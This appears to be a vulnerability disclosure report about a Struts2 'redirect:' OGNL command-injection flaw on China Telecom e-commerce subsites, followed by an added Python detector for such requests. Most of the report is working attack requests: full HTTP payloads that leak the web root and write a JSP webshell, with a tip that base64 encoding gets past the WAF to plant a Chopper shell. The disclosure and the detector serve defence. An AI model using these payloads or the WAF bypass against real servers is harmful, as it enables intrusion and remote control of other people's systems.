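2016-05-30: Details reported to the vendor; awaiting vendor handling
2016-06-01: Vendor confirmed; details disclosed to the vendor only
2016-06-11: Details disclosed to core white hats and experts in related fields
2016-06-21: Details disclosed to regular white hats
2016-07-01: Details disclosed to intern white hats
2016-07-16: Details disclosed to the public

China Telecom: improperly fixed command execution vulnerability on multiple subsites (WAF bypass to write a webshell)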
http://**.**.**.**:8080/emallTelOmsWeb/sysmgr/login/login.action
**.**.**.**/integrateSys/checkNum.action
**.**.**.**/item/queryGoods.action
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 220

--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${(#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/"))}"

-1
--389b3f46292c4ee795f3f64e37d6f4db--
Getshell is possible:
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 1750

--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelOmsWeb8083/webapps/emallTelOmsWeb/s.jsp")).append("hex-encoded small webshell").close()}"

-1
--389b3f46292c4ee795f3f64e37d6f4db--
Then write the Chopper webshell (submitting the small webshell base64-encoded is enough to bypass the WAF):
http://**.**.**.**:8080/emallTelOmsWeb/f.jsp?z0=utf-8
**.**.**.**/s.txt
**.**.**.**/s.txt
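Severity: High
Vulnerability Rank: 10
Confirmed: 2016-06-01 17:52
CNVD has confirmed the situation described and has handed it over to CNCERT to notify China Telecom Group Corporation, which will coordinate follow-up handling with the website administrators.
None yet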
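
Added detection example, not part of the original report: both requests above carry the OGNL expression in the multipart field name of a GET request, so a filter has to read `Content-Disposition` names whatever the method and tolerate the nested quotes inside them. The function names, host, path, boundary and field values below are constructed for illustration.

```python
import re

# Special parameter prefixes handled by Struts2, and OGNL expression openers.
PREFIX = re.compile(r'^\s*"?(redirectAction|redirect|action):', re.I)
OGNL = re.compile(r'[$%]\{')
# Take everything after name= up to end of line: the field names in the report
# contain nested double quotes, so a strict quoted-string parser would cut them short.
DISPOSITION = re.compile(rb'^content-disposition:[^\r\n]*?\bname=([^\r\n]*)', re.I | re.M)

def split_request(raw: bytes):
    """Split a raw HTTP request into (method, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower()] = value.strip()
    return method, headers, body

def suspicious_field_names(raw: bytes):
    """Return (method, field name, reasons) for each suspicious multipart part."""
    method, headers, body = split_request(raw)
    # Decide on Content-Type alone; a GET with a body is inspected like a POST.
    if not headers.get(b"content-type", b"").lower().startswith(b"multipart/form-data"):
        return []
    hits = []
    for match in DISPOSITION.finditer(body):
        name = match.group(1).decode("utf-8", "replace")
        reasons = []
        if PREFIX.search(name):
            reasons.append("struts-prefix")
        if OGNL.search(name):
            reasons.append("ognl-expression")
        if reasons:
            hits.append((method, name, reasons))
    return hits

def build(method: bytes, field: bytes) -> bytes:
    """Constructed sample request; host, path and boundary are placeholders."""
    return (method + b" /app/login.action HTTP/1.1\r\nHost: app.example.test\r\n"
            b"Content-Type: multipart/form-data; boundary=XYZ\r\n\r\n"
            b"--XYZ\r\nContent-Disposition: form-data; name=" + field +
            b"\r\n\r\n-1\r\n--XYZ--\r\n")

SAMPLE_FLAGGED = build(b"GET", b'"redirect:/${"x"+1}"')   # constructed, harmless
SAMPLE_CLEAN = build(b"POST", b'"username"')               # constructed

if __name__ == "__main__":
    for sample in (SAMPLE_FLAGGED, SAMPLE_CLEAN):
        print(suspicious_field_names(sample))
```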